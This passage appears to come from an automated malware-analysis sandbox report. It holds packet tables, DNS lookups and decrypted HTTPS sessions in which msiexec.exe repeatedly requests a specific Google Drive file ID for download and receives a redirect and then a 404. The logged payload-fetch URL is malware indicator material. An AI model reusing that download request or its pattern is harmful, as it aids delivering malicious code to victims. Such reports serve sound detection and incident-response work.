                                                              Jan 11, 2025 00:03:03.001935005 CET44349771216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:03.001991987 CET49771443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:03.009948969 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:03.010051012 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:03.010139942 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:03.010369062 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:03.010400057 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:03.661442041 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:03.661586046 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:03.662111998 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:03.662120104 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:03.662332058 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:03.662336111 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:04.086226940 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:04.086309910 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:04.086328983 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:04.086369991 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:04.086405039 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:04.086451054 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:04.086482048 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:04.086524010 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:04.086592913 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:04.086639881 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:04.090663910 CET49772443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:04.090683937 CET44349772172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:04.439512014 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:04.439564943 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:04.439636946 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:04.453578949 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:04.453608990 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.089179993 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.089281082 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:05.091228008 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.091337919 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:05.092765093 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:05.092782021 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.093074083 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.093125105 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:05.093403101 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:05.139334917 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.477504015 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.478599072 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.478837967 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:05.479077101 CET49773443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:05.479099035 CET44349773216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:05.495654106 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:05.495708942 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:05.495790958 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:05.496053934 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:05.496068001 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.147532940 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.147634029 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.148252010 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.148261070 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.148456097 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.148461103 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.574632883 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.574740887 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.574776888 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.574815035 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.574820042 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.574846029 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.574855089 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.574889898 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.574924946 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.574969053 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.575040102 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.575084925 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.575696945 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.575716019 CET44349774172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:06.575730085 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.575759888 CET49774443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:06.691971064 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:06.692019939 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:06.692205906 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:06.692430973 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:06.692447901 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:07.333081007 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:07.333225012 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:07.333879948 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:07.333895922 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:07.334094048 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:07.334104061 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:07.724478006 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:07.724584103 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:07.724612951 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:07.724668026 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:07.724767923 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:07.724809885 CET44349775216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:07.724860907 CET49775443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:07.732887030 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:07.732933044 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:07.733006001 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:07.733230114 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:07.733261108 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.365447998 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.365535021 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:08.366092920 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:08.366101027 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.366259098 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:08.366264105 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.793862104 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.793925047 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.793981075 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.794075012 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:08.794133902 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:08.794843912 CET49776443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:08.794868946 CET44349776172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:08.926703930 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:08.926745892 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:08.926899910 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:08.927155972 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:08.927164078 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.587508917 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.587713003 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.590361118 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.590502977 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.594094038 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.594105005 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.594417095 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.594501019 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.595171928 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.635330915 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.974556923 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.974769115 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.974785089 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.974973917 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.975413084 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.975457907 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:09.975904942 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:09.975904942 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:10.003360987 CET49777443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:10.003386021 CET44349777216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:10.082474947 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:10.082526922 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:10.082631111 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:10.082943916 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:10.082957983 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:10.715812922 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:10.715871096 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:10.716603041 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:10.716612101 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:10.716778040 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:10.716783047 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:11.145045996 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:11.145220995 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:11.145279884 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:11.145279884 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:11.145318031 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:11.145360947 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:11.145391941 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:11.145438910 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:11.146294117 CET49778443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:11.146311045 CET44349778172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:11.270133972 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:11.270183086 CET44349779216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:11.270308018 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:11.270621061 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:11.270631075 CET44349779216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:11.899537086 CET44349779216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:11.902399063 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:11.902888060 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:11.902901888 CET44349779216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:11.903073072 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:11.903079033 CET44349779216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:12.291060925 CET44349779216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:12.291136026 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:12.291356087 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:12.291408062 CET44349779216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:12.291461945 CET49779443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:12.302501917 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:12.302542925 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:12.302634001 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:12.302921057 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:12.302932978 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:12.959237099 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:12.959393024 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:13.767453909 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:13.767487049 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:13.767791033 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:13.767798901 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:14.122414112 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:14.122458935 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:14.122581005 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:14.122589111 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:14.122647047 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:14.123411894 CET49780443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:14.123437881 CET44349780172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:14.238957882 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.239012957 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:14.239128113 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.239553928 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.239569902 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:14.896428108 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:14.896513939 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.897164106 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:14.897325039 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.899585962 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.899595976 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:14.899817944 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:14.899863005 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.900542021 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:14.947334051 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:15.296052933 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:15.296232939 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:15.296272993 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:15.296489000 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:15.296526909 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:15.296598911 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:15.296601057 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:15.296612978 CET44349781216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:15.296627045 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:15.296653986 CET49781443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:15.305762053 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:15.305795908 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:15.305900097 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:15.306207895 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:15.306231022 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:15.938584089 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:15.938709021 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:15.939402103 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:15.939410925 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:15.939646959 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:15.939652920 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:16.355138063 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:16.355206013 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:16.355211973 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:16.355222940 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:16.355254889 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:16.355266094 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:16.355284929 CET44349782172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:16.355326891 CET49782443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:16.355339050 CET49782443192.168.2.8172.217.16.193

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 11, 2025 00:01:50.174949884 CET6539653192.168.2.81.1.1.1
                                                              Jan 11, 2025 00:01:50.181960106 CET53653961.1.1.1192.168.2.8
                                                              Jan 11, 2025 00:01:51.284293890 CET6458853192.168.2.81.1.1.1
                                                              Jan 11, 2025 00:01:51.291687965 CET53645881.1.1.1192.168.2.8

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Jan 11, 2025 00:01:50.174949884 CET192.168.2.81.1.1.10x3751Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                              Jan 11, 2025 00:01:51.284293890 CET192.168.2.81.1.1.10x469cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Jan 11, 2025 00:01:50.181960106 CET1.1.1.1192.168.2.80x3751No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                              Jan 11, 2025 00:01:51.291687965 CET1.1.1.1192.168.2.80x469cNo error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • drive.google.com
                                                              • drive.usercontent.google.com

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.849708216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:50 UTC216OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              2025-01-10 23:01:51 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:51 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: script-src 'nonce-YUxa4BKgMQvmGQ4-jl0QhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.849709172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:51 UTC258OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              2025-01-10 23:01:52 UTC2219INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQ2rQlINRCcUrcm12Z2EJjQL-kWl05VX5QWdGnN-xgU3naMid1RB4AZLUIEv6dEskZF
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:52 GMT
                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-5JFBfqfOh-lh1z2P86CmbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Set-Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz; expires=Sat, 12-Jul-2025 23:01:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:01:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 57 57 50 75 69 53 6b 62 48 5f 79 45 65 79 61 63 6c 66 77 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VWWPuiSkbH_yEeyaclfwuw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.849710216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:53 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
